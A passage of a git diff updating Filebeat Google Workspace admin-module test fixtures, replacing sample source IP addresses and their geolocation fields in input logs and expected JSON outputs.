-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -4247,26 +3931,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 33965,
+        "log.offset": 33886,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4287,7 +3967,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -4300,26 +3980,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 34409,
+        "log.offset": 34329,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4340,7 +4016,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -4354,26 +4030,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 34850,
+        "log.offset": 34769,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4395,7 +4067,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -4407,26 +4079,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 35311,
+        "log.offset": 35229,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4447,7 +4115,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}",
         "event.provider": "admin",
         "event.type": [
             "creation"
@@ -4458,26 +4126,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 35692,
+        "log.offset": 35609,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -4498,7 +4162,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -4510,26 +4174,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 36006,
+        "log.offset": 35922,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log
index dc0842dc0d4e..feeccbb4b37e 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log
@@ -1,9 +1,9 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"1.1.1.1"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DROP_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_LOG_SEARCH","parameters":[{"name":"EMAIL_LOG_SEARCH_END_DATE","value":"2020/07/28 04:59:59 UTC"},{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"EMAIL_LOG_SEARCH_RECIPIENT","value":"recipient"},{"name":"EMAIL_LOG_SEARCH_SENDER","value":"sender"},{"name":"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP","value":"89.160.20.156"},{"name":"EMAIL_LOG_SEARCH_SMTP_SENDER_IP","value":"89.160.20.156"},{"name":"EMAIL_LOG_SEARCH_START_DATE","value":"2002-10-02T10:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"EMAIL_UNDELETE","parameters":[{"name":"END_DATE","value":"2002-10-02T12:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"},{"name":"START_DATE","value":"2002-10-02T10:00:00Z"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_EMAIL_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CHANGE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"CREATE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"DELETE_GMAIL_SETTING","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_DESCRIPTION","value":"setting description"},{"name":"SETTING_NAME","value":"setting"},{"name":"USER_DEFINED_SETTING_NAME","value":"setting name"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"REJECT_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"EMAIL_SETTINGS","name":"RELEASE_FROM_QUARANTINE","parameters":[{"name":"EMAIL_LOG_SEARCH_MSG_ID","value":"id"},{"name":"QUARANTINE_NAME","value":"quarantine"}]}}
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json
index 02c317b9f0e2..675e48502e8f 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-gmail-test.json.log-expected.json
@@ -8,7 +8,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -24,23 +24,19 @@
         "log.offset": 0,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -61,7 +57,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}",
